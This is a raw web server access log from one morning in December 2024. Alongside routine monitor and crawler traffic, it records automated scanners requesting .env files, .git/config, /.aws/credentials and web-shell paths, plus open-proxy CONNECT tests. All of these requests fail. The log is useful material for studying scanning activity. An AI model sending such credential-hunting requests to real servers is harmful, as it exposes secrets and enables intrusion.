179.43.163.250 - - [01/Dec/2024:07:35:37 +0100] "GET /.env.prod HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:07:35:37 +0100] "GET /.env.prod.local HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:07:35:37 +0100] "GET /configuration/.env HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:07:35:38 +0100] "GET /server/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:07:35:38 +0100] "GET /config/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
212.91.246.72 - - [01/Dec/2024:07:35:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Dec/2024:07:35:51 +0100] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [01/Dec/2024:07:35:51 +0100] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Dec/2024:07:36:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:37:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:38:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.116.5.58 - - [01/Dec/2024:07:38:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [01/Dec/2024:07:39:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:40:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:41:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:42:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Dec/2024:07:43:21 +0100] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [01/Dec/2024:07:43:39 +0100] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [01/Dec/2024:07:43:39 +0100] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Dec/2024:07:43:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Dec/2024:07:44:15 +0100] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Dec/2024:07:44:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.163.250 - - [01/Dec/2024:07:45:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [01/Dec/2024:07:45:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:07:45:15 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [01/Dec/2024:07:45:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
212.91.246.72 - - [01/Dec/2024:07:45:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.197.174.6 - - [01/Dec/2024:07:46:04 +0100] "\x16\x03\x01" 501 318 "-" "-"
138.197.174.6 - - [01/Dec/2024:07:46:05 +0100] "\x16\x03\x01" 501 318 "-" "-"
138.197.174.6 - - [01/Dec/2024:07:46:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.197.174.6 - - [01/Dec/2024:07:46:05 +0100] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
138.197.174.6 - - [01/Dec/2024:07:46:05 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
138.197.174.6 - - [01/Dec/2024:07:46:06 +0100] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
138.197.174.6 - - [01/Dec/2024:07:46:06 +0100] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.197.174.6 - - [01/Dec/2024:07:46:06 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.197.174.6 - - [01/Dec/2024:07:46:06 +0100] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.197.174.6 - - [01/Dec/2024:07:46:06 +0100] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
138.197.174.6 - - [01/Dec/2024:07:46:07 +0100] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:07:46:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:47:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:48:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:49:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [01/Dec/2024:07:50:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:07:50:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:51:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:52:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:53:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:54:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:55:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:56:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:57:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:58:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:07:59:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:00:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:01:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:02:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:03:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:04:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.156.205 - - [01/Dec/2024:08:05:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Dec/2024:08:05:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:06:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
114.33.143.118 - - [01/Dec/2024:08:07:04 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [01/Dec/2024:08:07:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:08:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.156.205 - - [01/Dec/2024:08:08:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
37.254.18.159 - - [01/Dec/2024:08:08:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
66.249.66.88 - - [01/Dec/2024:08:09:33 +0100] "GET /localhost/log/2019/04/web.log HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:08:09:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
38.46.220.87 - - [01/Dec/2024:08:09:57 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 405 343 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Dec/2024:08:10:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:11:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.239.214.47 - - [01/Dec/2024:08:12:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
5.239.214.47 - - [01/Dec/2024:08:12:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Dec/2024:08:12:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
217.171.55.28 - - [01/Dec/2024:08:13:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Dec/2024:08:13:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
81.154.125.64 - - [01/Dec/2024:08:14:32 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [01/Dec/2024:08:14:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:15:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.19.138.234 - - [01/Dec/2024:08:16:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
38.46.220.87 - - [01/Dec/2024:08:16:12 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 405 343 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Dec/2024:08:16:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:17:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:18:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.89 - - [01/Dec/2024:08:19:31 +0100] "GET /web35/log/2010/09/ HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:08:19:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.163.250 - - [01/Dec/2024:08:19:56 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [01/Dec/2024:08:19:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:08:19:56 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [01/Dec/2024:08:19:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [01/Dec/2024:08:19:57 +0100] "GET /.env.local HTTP/1.1" 404 315 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:19:57 +0100] "GET /.env.preprod HTTP/1.1" 404 317 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:19:57 +0100] "GET /config/.env HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:19:58 +0100] "GET /configuration/.env HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:19:58 +0100] "GET /backup/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:19:58 +0100] "GET /.env.uat HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:19:59 +0100] "GET /src/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:19:59 +0100] "GET /.env.prod HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
154.213.187.42 - - [01/Dec/2024:08:20:06 +0100] "CONNECT api.ip.pn:443 HTTP/1.1" 405 339 "-" "Mozilla/5.0"
212.91.246.72 - - [01/Dec/2024:08:20:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:21:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:22:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.134.141.244 - - [01/Dec/2024:08:22:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.236 - - [01/Dec/2024:08:23:13 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
212.91.246.72 - - [01/Dec/2024:08:23:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:24:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:25:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:26:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:27:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:28:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.120.113.56 - - [01/Dec/2024:08:29:04 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; SM-A705GM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
212.91.246.72 - - [01/Dec/2024:08:29:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:30:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:31:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [01/Dec/2024:08:32:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:08:32:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
203.55.131.5 - - [01/Dec/2024:08:33:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Dec/2024:08:33:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.19.138.234 - - [01/Dec/2024:08:34:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.249.66.87 - - [01/Dec/2024:08:34:50 +0100] "GET /web12/application/views/scripts/unternehmen/ HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [01/Dec/2024:08:34:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.120.113.56 - - [01/Dec/2024:08:35:43 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; GT-P5210 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
212.91.246.72 - - [01/Dec/2024:08:35:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:36:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.248 - - [01/Dec/2024:08:37:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Dec/2024:08:37:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [01/Dec/2024:08:38:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
87.120.113.56 - - [01/Dec/2024:08:38:23 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; RMX1805) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36"
212.91.246.72 - - [01/Dec/2024:08:38:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Dec/2024:08:39:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.248 - - [01/Dec/2024:08:40:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
46.19.138.234 - - [01/Dec/2024:08:40:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Dec/2024:08:40:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.19.138.234 - - [01/Dec/2024:08:41:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
46.19.138.234 - - [01/Dec/2024:08:41:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.236.176.27 - - [01/Dec/2024:08:41:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.246.72 - - [01/Dec/2024:08:41:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.120.113.56 - - [01/Dec/2024:08:42:37 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344"
212.91.246.72 - - [01/Dec/2024:08:42:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.120.113.56 - - [01/Dec/2024:08:42:52 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; POCO F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
87.120.113.56 - - [01/Dec/2024:08:42:52 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
87.120.113.56 - - [01/Dec/2024:08:42:53 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2)"
157.245.156.205 - - [01/Dec/2024:08:43:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
87.120.113.56 - - [01/Dec/2024:08:43:25 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
46.19.138.234 - - [01/Dec/2024:08:43:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.163.250 - - [01/Dec/2024:08:43:44 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [01/Dec/2024:08:43:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:08:43:44 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [01/Dec/2024:08:43:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [01/Dec/2024:08:43:44 +0100] "GET /data/.git/config HTTP/1.1" 404 321 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:45 +0100] "GET /.env.qa HTTP/1.1" 404 312 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:45 +0100] "GET /.envrc HTTP/1.1" 404 311 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:45 +0100] "GET /.env.stage HTTP/1.1" 404 315 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:45 +0100] "GET /.env.test HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:46 +0100] "GET /backup/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:47 +0100] "GET /www/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:47 +0100] "GET /dev/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:47 +0100] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:47 +0100] "GET /src/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:47 +0100] "GET /.env.backup HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:47 +0100] "GET /.env.config HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:48 +0100] "GET /build/.env HTTP/1.1" 404 315 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:48 +0100] "GET /.env.tmp HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:48 +0100] "GET /public/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:08:43:49 +0100] "GET /.env.docker HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
